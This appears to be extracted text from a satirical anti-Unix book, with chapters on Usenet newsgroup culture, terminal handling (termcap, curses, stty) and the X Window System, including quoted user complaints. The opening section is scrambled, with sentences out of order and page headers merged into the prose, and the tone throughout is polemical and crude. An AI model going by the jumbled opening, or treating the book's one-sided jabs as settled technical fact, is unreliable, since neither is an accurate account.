To:<rs/tmp/alt/sys/suneadlock@uunet. Certainly ego is also to blame: Look. As a result. however.. my name in lights. User unknown 550 <rs/tmp/alt/sys/suneadlock@uunet.104 Snoozenet ----.. The net effect was.net>. questions posted on Usenet collect lots of public answers. Like the atom bomb.net>.
with illustrative examples. that contain the frequently asked questions and their answers.BIZARRE? I THINK THAT THIS NEWSFROUP OOPS. I THINK THAT THEIR COOL. called FAQs. more rudely. but . I AM NEW HERE. there are a lot of us who *like* dead baby jokes.babies Dead Baby joke swapping . DOES ANYONE HAVE ANY BIZARRE DEAD BABY JOKES? Enthusiasm Wow! This stuff is great! But one thing I’ve noticed is that every time someone tries to tell a dead baby joke.dead. This seems to help some. but not always. Innocence HI. There are often articles that say “where’s the FAQ” or.. This really sucks. everyone says that they don’t want to hear them. many newsgroups have volunteers who periodically post articles.” Seven Stages of Snoozenet By Mark Waks The seven stages of a Usenet poster.. HEE) STUFF IS REAL NEAT.humor. FOO@BAR.MY FIRST SMILEY.BITNET says: >[dead chicken joke deleted] This sort of joke DOES NOT BELONG HERE! Can’t you read the rules? Gene Spafford *clearly states* in the List of Newsgroups: rec.Seven Stages of Snoozenet 105 To help lessen the frequency of frequently asked questions. Therefore. NEWGROUP --.humor.dead. I propose that we create the newsgroup rec. Can anyone tell me how to create a newsgroup? Arrogance In message (3.HEE. say “I suppose this is a FAQ. :-) < -.14159@BAR). WHY DO THEY CALL THIS TALK. DO YOU HAVE INTERESTING ONES? PLEASE POST SOME.babies specifically for those of us who like these jokes.
you’ll come to understand that twits are a part of life on the net. Half the jokes were *completely* original to this group.h. chill out.babes. When you’ve been around as long as I have.BITNET requesting that this person’s net access be revoked immediately.new specifically to keep this sort of > ANCIENT jokes out! Go away and stick with r. I’m unsubscribing. I mean. Good-bye!. it was dynamic and innovative. I give up. as of now. Look . so that they cannot spread this kind of #%!T over the net.dead. Disgust In message (102938363617@Wumpus). okay? Hey. in the past three months alone! When we first started this newsgroup. it *must* be a baby—capeesh? This person is clearly scum—they’re even hiding behind a pseudonym.humor. all we have are hacks who want to hear themselves speak. James_The_Giant_Killer@Wumpus writes: > Q: How do you fit 54 dead babies in a Tupperware bowl? > ^L > A: La Machine! HAHAHA! Are you people completely devoid of imagination? We’ve heard this joke *at least* 20 times. You people are dull as dishwater. ones that no one had heard before.106 Snoozenet Simple enough for you? It’s not enough that the creature be dead. anyway? I am writing to the sysadmin at BAR.b until you > manage to come up with an imagination. We would trade dead baby jokes that were truly fresh. they are obviously in on it—I will urge that their feeds cut them off post-haste. what kind of a name is FOO. If said sysadmin does not comply. You can have your stupid arguments without me. wildman.d. Now.
so it should not be created.humor. Keep your cool.d. byte@nybble (J. all of the news admins in the world will have decided to drop us completely. It should be clear to people by now that this Cluckhead is full of it.dead. Quartermass Public) writes: >>>> In message (4:00@cluck).dead. and don’t let it bug you.chicken. Then.b.babes.chicken. > That doesn’t even make sense! Your logic is completely flawed.humor. rec. The guidelines clearly state that you >>>> should be able to prove sufficient volume for this group.humor. chickenman@cluck (Cluck Kent) crows: > In message (2374373@nybble).Seven Stages of Snoozenet 107 at it this way: at least they haven’t overwhelmed us yet.humor.new are still fresh and interesting. you TURD? >> This sort of ad hominem attack is uncalled for. Most of the jokes in rec. I have >>>> heard no such volume in rec.chicken (and undoubtedly.new).dead.chicken.dead.h.humor. By that time. >>> The last time we tried to post a dead chicken joke to r. I point out that they >>>> should follow the rules. we >>> were yelled at to keep out! How DARE you accuse us of not >>> having the volume.d.b.newfy. byte@nybble (J. Quartermass Public) writes: >> In message (5:00@cluck).humor. rec.dead.h. We can hope that people like newby above will go lurk until they understand the subtleties of dead baby joke creation. People like this really burn me.humor.babes. Cluck? To bring about the end of Usenet? Humph! . we get rec.humor. >>>> Before they go asking for this newsgroup. There is no interest in rec. My point is simply >> this: if there were interest in telling jokes about dead chickens. so it is >> obvious that there is no interest in chicken jokes.dead. We haven’t heard any such jokes. chickenman@cluck(Cluck Kent) crows: >>>>> Therefore. Doesn’t he realize that it will just take a few more newsgroups to bring this whole house of cards down around us? First. >> then we surely would have heard some jokes about dead *baby* >> chickens in r. but we should bear with them if they don’t. Next. Ossification In message (6:00@cluck). they’ll be asking for rec. so I must >>>> conclude that this proposal is a sham and a fraud on the >>>> face of it. Is that what you want.ethnic. I propose the creation of rec. chickenman@cluck (Cluck Kent) crows: >>> In message (2364821@nybble).
and we shouldn’t push at it.108 Snoozenet I urge everyone to vote against this proposal. lest it break. The current system works. .
newfoundland.humor and rec. when we could read about it all in one place. how things have grown.Seven Stages of Snoozenet 109 Nostalgia Well. My. At the time.ethnic. they’ve just created rec. there were only two newsgroups under the humorous banner: rec. . Nowadays. It seems like such a short time ago that I first joined this net..humor.funny. Ah..humor. I’m amazed at how things have split. for the good old days. you have to have 20 newsgroups in your sequencer just to keep up with the *new* jokes.bizarre.
110 .
Teletypes support operations like printing a character. Original Sin Unfortunately for us. place the cursor at arbitrary positions on the screen. As soon as more than one company started selling VDTs. among other things. where each separate pixel could be turned on or off (and in the case of color. which means that programs interact with the user rather than solely with the file system. at the very least. the capabilities of the display and input hardware that the user has. each pixel could have its own color from a color map). which output characters much faster than hardcopy terminals and. two different input/output technologies have been developed: the characterbased video display terminal (VDT).6 Terminal Insanity Curses! Foiled Again! Unix is touted as an interactive system. software engineers faced an immediate problem: different manufacturers used different . The quality of the interaction depends on. and the ability of a program to use this hardware. and moving the paper up a line at a time. and the bit-mapped screen. Unix was designed in the days of teletypes. backspacing. Since that time.
Programmers had to find a way to deal with the differences. When bugs were discovered in the so-called termcap library. Instead of teaching each application program how to display information on the user’s screen. different applications couldn’t interoperate on the same screen. VT102. scripts. ZK2. .) And. rather than each application. an so on) into their VMS operating system. unsuspecting users grew up around the holidays. And because the screen was managed by the operating system. application programs. was linked with every single application program. Because the screen was managed on a per-application basis. perhaps most importantly. and operating characteristics. Programmers at the revered Digital Equipment Corporation took a very simple-minded approach to solving the heterogenous terminal problem. Indeed. mail messages. Instead. They then hard-coded algorithms for displaying information on the standard DEC VT52 (then the VT100. within DEC’s buildings ZK1. and suddenly every existing application would work on the new terminal without modification. and ZK3. A special input/output subsystem within the Lab’s ITS kernel kept track of every character displayed on the user’s screen and automatically handled the differences between different terminals. these algorithms were built into the ITS operating system itself. Since their company manufactured both hardware and software. given the state of Unix at that time. each one assumed that it had complete control (not a bad assumption. but then this library. the Unix kernel still thought that it was displaying information on a conventional teletype. control characters. the programs that were built from termcap had to be relinked (and occasionally recompiled). instead of being linked into the kernel where it belonged (or put in a shared library). every program could do things like refresh the screen (if you had a noisy connection) or share part of the screen with another program. Unix (through the hand of Bill Joy) took a third approach. useful if you want to answer somebody’s question without walking over to their terminal. an entire tradition of writing animated “christmas cards” and mailing them to other.112 Terminal Insanity control sequences to accomplish similar functions.) At the MIT AI Laboratory. a different solution was developed. they simply didn’t support terminals made by any other manufacturer. The techniques for manipulating a video display terminal were written and bundled together into a library. (Think of these as early precursors to computer worms and viruses. There was even a system utility that let one user see the contents of another user’s screen. and any other system string that they could get their hands on. Adding a new kind of terminal only required teaching ITS the terminal’s screen size.
Indeed. . while the far more elegant NeWS. the most often used X application is xterm. The most rational method for a system to support display devices is through an abstract API (Application Programmer’s Interface) that supports commands such as “backwards character. and there really are many users for each Unix box (versus one user per DOS box). the X Window System came from MIT.” Unix decided the simplest solution was to not provide an API at all.” “clear screen. or programmable function keys. that’s just too darn bad: this is Unix. If your terminal has provisions for line drawing. line insert. The most interactive tool they’re using is probably vi. and at the other end of modem connection. If the Unix aficionados are right. line delete. then well over two-thirds of the people using Unix are stuck doing so on poorly supported VDTs. executives’ pockets. It just goes to show you that the Unix world has its vision and it gets what it wants.” and “position cursor. The logical culmination of this catch-ascatch-can attitude is the X Window System. There remain scads of VDTs hooked to Unixes in offices. double-height characters. Today. came out of Sun. Half-implemented hack (such as termcap) after half implemented hack (such as curses) have been invented to give programs some form of terminal independence. How odd. Unix’s handling of character-based VDTs is so poor that making jokes about it can’t do justice to the horror.The Magic of Curses 113 As a result. Unix never developed a rational plan or model for programs to interact with a VDT. scroll regions. The advent of X and bitmapped screens won't make this problem go away. a VT100 terminal emulator. a monstrous kludge that solves these problems by replacing them with a much larger and costlier set of problems. but the root problem has never been solved. And guess what software is being used to control the display of text? None other than termcap and curses! The Magic of Curses Interactive programs need a model of the display devices they will control. Interestingly enough. written by James Gosling. protecting fields. and inverse video. Few Unix applications can make any use of “smart” terminal features other than cursor positioning.
2. 1 And if that wasn’t bad enough. incompatible terminal capability representation system called terminfo. those left out. . but not enough to overcome initial design flaws. there is still no standard API for character-based VDTs. This time. just like /etc/termcap itself has no standing. would have been the right choice. Ken inherited the vi brain damage when he decided to use the termcap file. three problems arose. tailored to the idiosyncracies of vi. it’s not a portable solution. only those portions that are relevant for vi are considered. Ken Arnold took it upon himself to write a library called curses to provide a general API for VDTs. This API had two fundamental flaws: 1. hard-wiring into themselves the escape sequences for the most popular terminals. could not be used by other programmers in their own code. Thus. and eschew character attributes that could make the screen easier to understand. learning from the mistakes of history. Instead.1 As a result. Starting over. AT&T developed its own. curses is not a very professional piece of code. Bill Joy provided his own API based on a terminal descriptor file called termcap. with the advent of vi. only part of the Unix community uses curses. They use characters like “|” and “-” and “+” to draw lines. The API engine. Eventually. In 1994. Time has somewhat ameliorated this problem. First. It doesn’t attempt to describe the different capabilities of terminals in general. And you can always tell a curses program from the rest: curses programs are the ones that have slow screen update and extraneous cursor movement. The format of the termcap file—the cursor movement commands included. it believes in simplicity over robustness. and the techniques for representing complex escape sequences—was.114 Terminal Insanity For many years programs kludged around the lack of a graphical API. even on terminals that sport line-drawing character sets. Third. Like most Unix tools. it’s just a library with no standing. developed for vi. other programs could read the escape sequences stored in a termcap file but had to make their own sense of which sequences to send when to the terminal. Second. and remains to this day. Therefore. As a result of these problems.
Of course. The road to Hell is paved with good intentions and with simple hacks such as this. Application programs get to send raw control commands to the disk. when piped to the terminal cause some form of animation to appear. working with some but not with others. Let’s give them a system in which the disk is treated the same way the terminal is: without an API. For example. It begins with the idea that the way to view a text file is to send its characters to the screen. for doing so is an abstraction violation. for a cottage industry. when a program screws up. Abstraction (an API) is important because it enables further extension of the system. those in the Unix community most afflicted with microcephaly are enamored with the hack of generating files containing escape sequences that.The Magic of Curses 115 Senseless Separators The myopia surrounding terminal handling has an historical basis. Some part of the OS should track the terminal type and provide the necessary abstraction barrier. One can dispense with this display program by arranging the line separator to be characters that. (Such an attitude is commensurate with the “everything is a stream of bytes” Unix mantra. For example. for portable files. Also. They gleefully mail these off to their friends instead of doing their homework. Some Unix zealots refuse to believe or understand this. but it must either be in the kernel or be a standard dynamically linked library. and the system can now boast being “multi-media. cause it perform a carriage return and a line feed. We have a proposal for these people. Every disk drive has its own characteristics: these differences are best handled in . Momentary convenience takes precedence over robustness and abstractness. add sound to the API. Now those files can be used on any terminal. A program that understands this structure should be responsible for displaying the file. They think that each program should send its own escape sequences to the terminal without requiring the overhead of an API.) But herein lies the rub.” Fundamentally. programs will be dependent on the particular disks installed on the system. This way. The logical structure of a text file is a collection of lines separated by some line separator token. not only is an API needed. The newline as newlineplus-carriage-return is an example of how to prevent logical extension of the system. instead of the screen containing gibberish. such a proposal for controlling a hard disk is insanity. It’s a cute hack. but these files work only on one kind of terminal. the disks will contain gibberish. Now imagine a world with an API for directing the terminal and the ability to embed these commands in files. it is a clean base upon which to build. when sent to the terminal. this API forms a basis for expansion. More importantly.
This stuff ought to be handled 11 levels of software below the level at which a user types a command—the goddamned HARDWARE ought to be able to figure out what kind of terminal it is. and left alone. For those of us who use the X WINDOWS system to display WINDOWS on our workstations. and if it can’t it should put a message on my console saying. say. This idiot should be killed twice. blood. give up and get a real job. Some airhead has further messed up my life by seeing to it that most termcaps have the idea that “xterm” is an 80x65 line display.edu (Johnny Zweig) Subject: /etc/termcap Newsgroups: alt. say. 80x65 makes as much sense as reclining bucket seats on a bicycle—they are too goddamn big to fit enough of them on the screen. Johnny Zweig put it rather bluntly: Date: 2 May 90 17:23:34 GMT From: zweig@casca.peeves2 In my opinion as a scientist as well as a software engineer. Not every program or programmer is letterperfect: operations like reading or writing to the disk should be done only in one place within the operating system. and tears on the part of people trying to write software that doesn’t give its users the heebie-jeebies? And the first person who says “all you have to do is type ‘eval resize’ ” gets a big sock in the nose for being a clueless geek who missed the point. landing men on the moon or.cs. where they can be written once. to say the least. Why the hell hasn’t this bull been straightened out after 30 goddamn years of sweat. Why should terminals be treated any differently? Forcing programmers to be aware of how their programs talk to terminals is medieval. there is no reason in the world anyone should have to know /etc/termcap even EXISTS.” —Johnny Terminal 2 Forwarded to UNIX-HATERS by Olin Siebert.116 Terminal Insanity one place. let alone have to muck around with setting the right environment variables so that it is possible to vi a file. “You are using piss-poor hardware and are a loser.uiuc. Tetris. debugged. . It seems like figuring out what the hell kind of terminal I am using is not as hard as. launching nuclear missiles to within 10 yards of their targets. by a device driver.
A program that wants to manipulate the cursor directly must go through more gyrations than an Olympic gymnast. These might cause trouble: the null character because tputs would think that was the end of the string. The GNU Termcap documentation describes the problem and the workaround: Parameters encoded with ‘%. For example. and the newline because the kernel might add a carriage-return. like institutionalized bureaucracies. suppose that a program places a cursor at location (x. Unix offers no workaround. tgoto increments it by one.The Magic of Curses 117 This state of affairs. tgoto is careful to avoid these characters. To prevent such problems. Here is how this works: if the target cursor position value is such as to cause a problem (that is to say. would be livable (though still not acceptable) if there were a workaround. indeed. then compensates by appending a string to move the cursor back or up one position. .’ encoding can generate null characters. or padding characters normally used for a newline. nine or ten). zero. the tab because the kernel or other software might expand it into spaces. y) by sending an escape sequence followed by the binary encodings of x and y. tabs or newlines. it gets in the way by randomly permuting control commands that are sent to the VDT. Unix won’t allow arbitrary binary values to be sent unscathed to the terminal.
and then the restaurant gives you a dribble-glass to drink it from. which Unix they operate on. each one designed to handle a different terminal or type of network connection. though I think he's on this list) asked how the . Dunning” <jrd@stony-brook. 13 Nov 91 14:47:50 EST Alan Bawden <Alan@lcs. the subsystems take different commands and options depending on the local chapter they belong to. (The notion of a transparent networked environment in Unix is an oxymoron. The problem is that without a single coherent model of terminals. it displayed a little itty-bitty window at the top of my virtual terminal screen. I got out of it and verified that my TERM and TERMCAP environment variables were set right. and then on the other hand Unix makes it hard to send them. then finally gave up in disgust. Unix requires every program to manually generate the escape sequences necessary to drive the user’s terminal. and you’ll soon find your .cshrc and .) Our following correspondent got hit with shrapnel from all these programs: Date: From: Thu. On the one hand. It’s like going to a restaurant without a liquor license where you have to bring your own beer.com> To: UNIX-HATERS Subject: Unix vs terminal settings So the other day I tried to telnet into a local Sun box to do something or other.symbolics. to no avail. sent mail off to the local Unix wizard (who shall remain nameless. To compound the problem. Customizing your terminal settings Try to make sense of this. the different programs that do different tasks must all be told different vital statistics.edu> UNIX-HATERS Don’t tell me about curses What this is saying is so brain damaged it brings tears to my eyes. it was convinced my terminal was only a few lines high.scrc. telnet and rlogin track one set of customizations. that is.mit. These subsystems act as though they each belong to different labor unions. but when I brought up emacs. especially in the case of stty. but nope.login files accumulating crufty snippets of kludgy workarounds. 31 Jan 1991 11:06-0500 “John R. I thrashed around for a while.118 Terminal Insanity Alan Bawden has this to say about the situation: Date: From: To: Subject: Wed. and stty yet a third. tset another set. and tried again.
” “Hmmm. and used Zmacs. The wizard answered my mail with a marginally cryptic “Unix defaults. since information about terminal characteristics is strewn all over the place. I tried a few experiments. “Why is it not sufficient to set my env vars?” “Because the information’s stored in different places. there are all kinds . I’ve just been carrying it around for years…” Grrr. And. I don't know how it works. and sure enough. like I should have done in the first place. probably. At this point I decided it was futile to try to understand any of this (if even the local wizard doesn't understand it. So I say. tset with no args. so I went to ask him what that really meant. Smelling something rotten in the state of the software.” “Well. I wonder what that does?” “Beats me. that’s the value we typed in just a few minutes ago. so you do. Did you check the stty rows & columns settings?” I should have known better.” and lo! It now thinks my terminal is 48 lines high! But wait a second. You can easily get somebody else’s leftover stuff from their last session. and nobody bothers to initialize them when you log in. but I never do. rather than being kept in some central place. it’s useless. You have to run tset.” “But I do. mere mortals should probably not even try) and went back to my office to fix my init file to brute-force the settings I wanted.The Magic of Curses 119 bleep Unix decides the size of my terminal and what should I do about it. Perhaps if I feel ambitious I should look up the documentation on tset? Or would that confuse me further?” “No. I just copied this file from other old Unices that I had accounts on. what should I do here? What do you do in your init file?” He prints out his init file. I just have this magic set of cryptic shell code here. We logged into the offending Sun. in my login file. and say “stty all. don't do that. Turns out a bunch of your terminal settings get set in some low-level terminal-port object or someplace. typing “stty all” revealed that Unix thought the terminal was 10 lines high. “Oh. I log in.
. Makes me almost wish for my VMS machine back. maybe this is old news to some of you. Bleah. but I find it pretty appalling.120 Terminal Insanity of ad hoc things to bash one piece of database into conformance with others. I dunno.
The Magic of Curses 121 .
.
X has had its share of $5.77MHz IBM PC If the designers of X Windows built cars. —Marcus J. Ranum Digital Equipment Corporation X Windows is the Iran-Contra of graphical user interfaces: a tragedy of political compromises. and partisan protocols have tightened gridlocks. X Windows is to memory as Ronald Reagan was to money. Years of “Voodoo Ergonomics” have resulted in an unprecedented memory deficit of gargantuan proportions. Divisive dependencies. and just plain greed. Even the vanilla X11R4 “xclock” utility consumes 656K to run. there would be no fewer than five steering wheels hidden about the cockpit. Useful feature.000 toilet seats—like Sun’s Open Look clock tool. which gobbles up 1. that. and promulgated double standards. And X’s memory usage is increasing. aggravated race conditions. .7 The X-Windows Disaster How to Make a 50-MIPS Workstation Run Like a 4.4 megabytes of real memory! If you sacrificed all the RAM from 22 Commodore 64s to clock tool. marketing hype. none of which followed the same principles—but you’d be able to shift gears with your car stereo. entangled alliances. it still wouldn’t have enough to tell you the time. distributed deadlocks.
X leveled the playing field: for most applications.” This program displays its windows on the “window server. these were. (The idea of a window manager was added as an afterthought. the server provides services. the server is the remote machine that runs the application (i. the X server still turns fast computers into dumb terminals. decided to write a distributed graphical display server. and xclock. So when you see “client” think “the remote machine where the application is running. X provided one—a standard that came with its own free implementation. X insists on calling the program running on the remote machine “the client. The idea was to allow a program. The Nongraphical GUI X was designed to run three programs: xterm. the only programs that ran under the window system. You need a fairly hefty computer to make X run fast—something that hardware vendors love. only one of these programs implements anything in the way of cut-andpaste (and then. xload. as long as the computers were networked together and each implemented the X protocol. called a client. For some perverse reason that’s better left to the imagination. The two computers might be VAXes or Suns. there was no established Unix graphics standard.. to run on one computer and allow it to display on another computer that was running a special program called a window server. but X has defeated us by switching the meaning of client and server. At the time.) For the first few years of its development at MIT. who was familiar with W. a window system written at Stanford University as part of the V project. In all other client/server relationships.124 The X-Windows Disaster X: The First Fully Modular Software Disaster X Windows started out as one man’s project in an office on the fifth floor of MIT’s Laboratory for Computer Science. and it shows.” We’re going to follow X terminology when discussing graphical client/servers. and none of them requires a particularly sophisticated approach to color management.1 X took off in a vacuum. Is it any wonder. such a database service or computation service). A wizardly hacker. Even today. or one of each. Notice that none of these programs have any semblance of a graphical user interface (except xclock). in fact. only a single data type is supported).e. then. that these are all areas in which modern X falls down? 1 We have tried to avoid paragraph-length footnotes in this book.” and when you see “server” think “the local machine that displays output and accepts user input. everyone’s hardware suddenly became only as good as the free MIT X Server could deliver.” .
A stated design goal of Motif was to give the X Window System the window management capabilities of HP’s circa-1988 window manager and the visual elegance of Microsoft Windows. or any of the other necessary elements of a graphical user interface. but did not implement a particular policy for human-computer interaction. one running Windows and one running Unix/Motif. the X servers provided a mechanism for drawing on the screen and managing windows. menus. What Motif does is make Unix slow. Ice Cube: The Lethal Weapon One of the fundamental design goals of X was to separate the window manager from the window server. but it didn’t speak to buttons. Soon the Unix community had six or so different interface standards.X: The First Fully Modular Software Disaster 125 Ten years later. most computers running X run just four programs: xterm. and a window manager. The Motif Self-Abuse Kit X gave Unix vendors something they had professed to want for years: a standard that allowed programs built for different computers to interoperate. Build something on top of three or four layers of X to look like Windows. While this might have seemed like a good . rather than forcing people to purchase expensive bitmapped terminals to run character-based applications. not policy” was the mantra. “Mechanism. Motif can’t compete with the Macintosh OS or with DOS/Windows as a delivery platform.”' Now put two 486 boxes side by side. Watch one crawl. xclock. But it didn’t give them enough. then users wouldn’t get all of those ugly fonts. And most xterm windows run Emacs! X has to be the most expensive way ever of popping up an Emacs window. Watch it drop faster than the putsch in Russia. Watch it wither. Massachusetts. Real slow. X gave programmers a way to display windows and pixels. Call it “Motif. It’s a trade-off. xload. which was designed and hand coded in assembler. scroll bars. Programmers invented their own. It sure would have been much cheaper and easier to put terminal handling in the kernel where it belongs. A bunch of people who hadn’t written 10 lines of code in as many years set up shop in a brick building in Cambridge. On the other hand. Recipe for disaster: start with the Microsoft Windows metaphor. We kid you not. that was the former home of a failed computer company and came up with a “solution:” the Open Software Foundation’s Motif. That is.
The ICCCM is unbelievably dense. If you sit down at a friend’s Windows box. people were already writing window managers and toolkits.126 The X-Windows Disaster idea at the time (especially if you are in a research community. and so on. control-shift-meta-middle-button. with two buttons.” or “I39L” (short for “I. backward compatibility nightmares. you can use it. and with all possible window managers. It’s so difficult.” “Ice Cubed. But it was too late—by the time ICCCM was published. one of the most amazing pieces of literature to come out of the X Consortium is the “Inter Client Communication Conventions Manual. it screws up other programs. Things are not much better from the programmer’s point of view. it tries to cover everything the X designers forgot and tries to fix everything they got wrong. It describes protocols that X clients must use to communicate with each other via the X server. and deleting a popup window can quit the whole application. again with no problems. you can use it with no problems. with its single mouse button. and even simple applications. In short. window managers. And when one program doesn’t comply. In summary. you have to crossbar test it with every other application. and it still doesn’t work. keys go to the wrong window. and session management. selections. As a result. colormaps flash wildly and are never installed at the right time. L”). each one programmed a different way to perform a different function on each different day of the week—and that’s before you consider combinations like control-left-button. so each new version of the ICCCM was forced to bend over backwards to be backward compatible with the mistakes of the past. But just try making sense of a friend’s X terminal: three buttons. keyboard and colormap focus. a twisted mass of scabs and scar tissue . If you sit down at a friend’s Macintosh. it created a veritable user interface Tower of Babel. This is the reason that cut-and-paste never works properly with X (unless you are cutting and pasting straight ASCII text). 39 letters. drag-anddrop locks up the system. keyboard focus lags behind the cursor. ICCCM is a technological disaster: a toxic waste dump of broken protocols. it must be followed to the last letter. and then plead with the vendors to fix their problems in the next release. ICCCM compliance is one of the most complex ordeals of implementing X toolkits. including diverse topics like window management. If you want to write an interoperable ICCCM compliant application. that many of the benefits just aren’t worth the hassle of compliance. shift-right-button.” more fondly known as the “ICCCM. experimenting with different approaches for solving the human-computer interaction problem). complex nonsolutions to obsolete nonproblems.
certain propeller heads who confuse technology with economics will start foaming at the mouth about their client/server models and how in the future palmtops will just run the X server and let the other half of the program run on some Cray down the street. But a graphical client/server model that slices the interface down some arbitrary middle is like Solomon following through with his child-sharing strategy. what better way is there to force users to upgrade their hardware than to give them X. Using these toolkits is like trying to make a bookshelf out of mashed potatoes. —Jamie Zawinski X Myths X is a collection of myths that have become so widespread and so prolific in the computer industry that many of them are now accepted as “fact. and left eye end up on the server. Others need only mouse clicks. the server. the arms and lungs go to the client. simultaneously! The database client/server model (the server machine stores all the data. The legs. Some applications (like a flight simulator) require that all mouse movement be sent to the application. the head is left rolling around on the floor. Myth: X Demonstrates the Power of Client/Server Computing At the mere mention of network window systems. and the network between them. and the clients beseech it for data) makes sense. The fundamental problem with X’s notion of client/server is that the proper division of labor between the client and the server can only be decided on an application-by-application basis. Still others need a sophisticated combination of the two. They’ve become unwitting pawns in the hardware manufacturers’ conspiracy to sell newer systems each year. The computation client/server model (where the server is a very expensive or experimental supercomputer.X Myths 127 intended to cover up the moral and intellectual depravity of the industry’s standard naked emperor. and the client is a desktop workstation or portable computer) makes sense. and blood spurts everywhere. depending on the program’s state or the region of the screen where . After all. where a single application can bog down the client. heart.” without any thought or reflection.
. Downloaded code can draw windows. and the client sends a single message to the server when the interaction is complete. As an example. without bothering the server. Some programs need to update meters or widgets on the screen every second. track input events. and minimize network traffic by communicating with the application using a dynamic. without any network traffic or context switching. the user interface toolkit becomes an extensible server library of classes that clients download directly into the server (the approach taken by Sun’s TNT Toolkit). high-level protocol. With NeWS. Other programs just want to display clocks. Application programs on remote machines can download their own special extensions on demand and share libraries in the server. saving both time and memory. the client could draw the IC anywhere on the screen simply by sending the name and a pair of coordinates. the window manager itself was implemented inside the server. provided that there was some way to tell it to do so. eliminating network overhead for window manipulation operations—and along with it the race conditions. and creating a look-and-feel that is both consistent across applications and customizable. lowbandwidth) communication lines. imagine a CAD application built on top of such an extensible server.128 The X-Windows Disaster the mouse happens to be. The application could download a program to draw an IC and associate it with a name. The user can drag an IC around smoothly. provide fast interactive feedback. which are called automatically to refresh and scroll the window. From then on. and interaction problems that plague X toolkits and window managers. The right graphical client/server model is to have an extensible server. Better yet. the server could just as well do the updating. Toolkit objects in different applications share common objects in the server. Ultimately. This makes it possible to run interactive clients over low-speed (that is. context switching overhead. the client can download programs and data structures to draw the whole schematic. Sounds like science fiction? An extensible window server was precisely the strategy taken by the NeWS (Network extensible Window System) window system written by James Gosling at Sun. With such an extensible system. NeWS was not economically or politically viable because it solved the very problems that X was designed to create.
then violently explodes. When you double-click on the bomb.stanford. But if you intuitively drag and drop the bomb on the DBX Debugger Tool. ask the unix wizard. filling up the file system. but so little of Unix is designed for the desktop metaphor that it’s just one kludge on top of another. it runs a text editor on the core dump. it beeps and prints “rename: invalid argument” at the bottom of the window. to akbar. and taking out the File Manager with shrapnel. You say setenv DIS- .edu> UNIX-HATERS MIT-MAGIC-COOKIE-1 For the first time today I tried to use X for the purpose for which it was intended. Oh. then instantly deletes the entire directory tree without bothering to update the graphical directory browser. OK. as the core dump (including a huge unmapped gap of zeros) is pumped through the server and into the debugger text window. (This bug has since been fixed. Harmless. overwhelming the file server. No doubt there’s some magic I have to do to turn cross-network X on. The “drag-and-drop” metaphor tries to cover up the Unix file system. A shining example is Sun’s Open Windows File Manager. Maybe the “sag-and-drop” metaphor is more appropriate for such ineffective and unreliable performance. dumping an even bigger core file in place of your original one. 30 Jan 91 15:35:46 -0800 David Chapman <zvona@gang-of-four. which inflates to the maximum capacity of swap space. That’s stupid. but not very useful. they can’t eliminate them. which goes out of its way to display core dump files as cute little red bomb icons. where my program runs.X Myths 129 Myth: X Makes Unix “Easy to Use” Graphical interfaces can only paper over misdesigns and kludges in the underlying operating system. The following message illustrates the X approach to “security through obscurity”: Date: From: To: Subject: Wed. where I was logged in and running X. namely cross-network display. So I got a telnet window from boris. with little holes and sharp edges popping up everywhere. it does exactly what you’d expect if you were a terrorist: it ties the entire system up. Ran the program and it dumped core.) But that’s not all: the File Manager puts even more power at your fingertips if you run it as root! When you drag and drop a directory onto itself.
let’s look at the man page. you have to run xauth. well. (Better not speculate about what the 0 is for. What the hell protocol am I supposed to use? Why should I have to know? Well. just run xauth and don’t worry about it. maybe it will default sensibly. too. xauth> add boris:0 xauth: (stdin):4 bad "add" command line Great. or Unix is too stupid to tell it. I suppose I’ll need to know what a hexkey is. Since we set the DISPLAY variable to “boris:0. Presumably dpy is unix for “display” and protoname must be… uh… right. I give this 10 seconds of thought: what sort of security violation is this going to help with? Can’t come up with any model. I thought that was the tool I used for locking the strings into the Floyd Rose on my guitar. xauth has a command processor and wants to have a long talk with you.) Run the program again. The data is specified as an even-length string of hexadecimal digits. The first digit gives the most significant 4 bits of the octet and the second digit gives the least significant 4 bits. for a good joke. I won’t include the whole man page here. that’s Unix for you. Here’s the explanation of the add command: add displayname protocolname hexkey An authorization entry for the indicated display using the given protocol and key data is added to the authorization file. yes. In order to run a program across the goddamn network I’m supposed to be typing in strings of hexadecimal digits which do god knows what using a program that . Oh. A protocol name consisting of just a single period is treated as an abbreviation for MIT-MAGIC-COOKIE-1. Oh.” maybe that’s a dpyname.Xauthority file. to tell it that it’s OK for boris to talk to akbar. well. Do: xauth> help add add dpyname protoname hexkey add entry Well. Well. presumably we want to add an entry for boris. that’s not very helpful. It manipulates a . This is obviously totally out of control. This is done on a per-user basis for some reason. Presumably this means that X is too stupid to figure out where you are coming from. Oh. you might want to man xauth yourself. protocol name. each pair representing one octet. apparently.130 The X-Windows Disaster PLAY boris:0. Talk to the unix wizard again. OK. Now it tells me that the server is not authorized to talk to the client.
What bizarre pathways do their minds wander? The closest I can get is an image of an order-seeking system that is swamped by injected noise—some mental patients exhibit that kind of behavior. It’s really sobering to think we live in a society that allows the people who design systems like xauth to vote. not the program. I submit to the will of Allah. for example. He should have known better. None of these guys uses xauth. watch him type in his password) is a grad student here.stanford. or sort of nervously toggle the xhost authentication when they need to crank up an X network connection. .edu. A cycle sink.X Myths 131 has a special abbreviation for MIT-MAGIC-COOKIE-1? And what the hell kind of a name for a network protocol is that? Why is it so important that it’s the default protocol name? Obviously it is Allah’s will that I throw the Unix box out the window. I know several people who are fairly wizardly X hackers. drive cars. or frenzied thrashing.mit. rational. the guy that posted the program showing how to capture keystrokes from an X server (so you can. a malignant entity that lurks around.edu zvona@gang-of-four.cs. or xauth. For example.soar. (Blame the victim.cmu. And out pops gibberish. I can’t really get a mental picture of the sort of people who design these kinds of systems. They just live dangerously. Anybody who has ever used X knows that Chapman’s error was trying to use xauth in the first place. own firearms. I conclude that they are really a sort of cognitive black hole. 30 Jan 91 23:49:46 EST ian@ai. I know several people who have stared at it long and hard. I don’t know anyone that uses xauth. When I think of the time that I have invested trying to understand and use these systems. and reproduce. but in the end the complexity of the noise overwhelms them.edu> Wed.) From: Date: To: Cc: Subject: Olin Shivers <shivers@bronto. UNIX-HATERS MIT-MAGIC-COOKIE-1 Hereabouts at CMU. waiting to entrap the unwary. They try so hard to be coherent.
